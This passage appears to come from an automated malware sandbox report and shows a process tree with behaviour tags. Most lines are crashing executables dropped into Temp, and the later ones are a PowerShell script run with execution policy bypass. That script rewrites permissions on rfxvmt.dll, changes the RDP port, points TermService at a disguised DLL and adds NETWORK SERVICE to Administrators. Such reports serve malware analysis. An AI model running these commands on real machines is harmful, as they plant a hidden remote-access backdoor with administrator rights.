                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                PID:5688
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4008 -ip 4008
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5784
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3276 -ip 3276
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                  PID:5664
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5272 -ip 5272
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                  PID:5684
                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2276
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6752
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ffcbc5746f8,0x7ffcbc574708,0x7ffcbc574718
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2012
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2500 -ip 2500
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                        PID:5160
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5244 -ip 5244
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                        PID:4844
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:7100
                                                                                                                                                                        • C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                                                                          "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:6108
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2252
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5964
                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6604
                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                PID:684
                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:2848
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 448
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                    PID:2796
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2848 -ip 2848
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                PID:4740
                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:6540
                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Drops desktop.ini file(s)
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  PID:5848
                                                                                                                                                                                  • C:\Windows\System32\MsiExec.exe
                                                                                                                                                                                    C:\Windows\System32\MsiExec.exe -Embedding 21BB8D28CF411FCB5BD76491F347A730 C
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                                                    PID:2528
                                                                                                                                                                                  • C:\Windows\system32\srtasks.exe
                                                                                                                                                                                    C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:5
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2156
                                                                                                                                                                                    • C:\Windows\System32\MsiExec.exe
                                                                                                                                                                                      C:\Windows\System32\MsiExec.exe -Embedding 86CEA7C9524FA7FBBBD1D2E45CD925C8
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      PID:5972
                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 7405CC2E5399B1EE5DE0A38A57DB2D85 C
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      PID:6516
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:2720
                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 2720 -s 2208
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                          PID:6248
                                                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    PID:6944
                                                                                                                                                                                  • C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                                                                                    C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    PID:4600
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2092
                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                      PID:3408
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 408 -p 2720 -ip 2720
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:4672
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:4304
                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 4304 -s 1636
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:6660
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 416 -p 4304 -ip 4304
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:6416
                                                                                                                                                                                    • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                      PID:5344
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:404
                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 404 -s 1620
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:6972
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 520 -p 404 -ip 404
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:596
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:5516
                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5516 -s 1624
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:5100
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 484 -p 5516 -ip 5516
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:1596
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:2744
                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 2744 -s 1632
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:5380
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 400 -p 2744 -ip 2744
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:456
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:5720
                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5720 -s 1620
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:1624
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 404 -p 5720 -ip 5720
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:4008
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:3736
                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 3736 -s 1620
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:2348
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 404 -p 3736 -ip 3736
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:6636
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\PCHealthCheck\PCHealthCheck.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:4312
                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 4312 -s 1620
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:5172
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 448 -p 4312 -ip 4312
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:6932
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\51BA.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\51BA.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:2620
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\51BA.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\51BA.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        PID:3272
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\58A1.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\58A1.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      PID:6012
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6043.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6043.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2764
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 272
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:4872
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\65B2.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\65B2.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      PID:1996
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2764 -ip 2764
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:6116
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6DA3.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6DA3.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:3080
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3080 -s 280
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:6728
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7276.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7276.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:3736
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 276
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:4312
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3080 -ip 3080
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:7124
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3736 -ip 3736
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:7148
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8553.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8553.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5032
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          PID:6596
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zneph2st\zneph2st.cmdline"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2404
                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB611.tmp" "c:\Users\Admin\AppData\Local\Temp\zneph2st\CSCBAB80FBE54494038AE377E0C6D1D242.TMP"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2860
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3744
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:6340
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4312
                                                                                                                                                                                                    • C:\Windows\system32\takeown.exe
                                                                                                                                                                                                      "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:2720
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:1996
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:6748
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:4276
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:6920
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:6840
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:3456
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:2180
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:2156
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                        PID:3560
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4548
                                                                                                                                                                                                        • C:\Windows\system32\net.exe
                                                                                                                                                                                                          "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4112
                                                                                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                                                                                              C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:4840
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2928
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  cmd /c net start rdpdr
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5488
                                                                                                                                                                                                                    • C:\Windows\system32\net.exe
                                                                                                                                                                                                                      net start rdpdr
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:2540
                                                                                                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                          C:\Windows\system32\net1 start rdpdr
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:6804
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3396
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
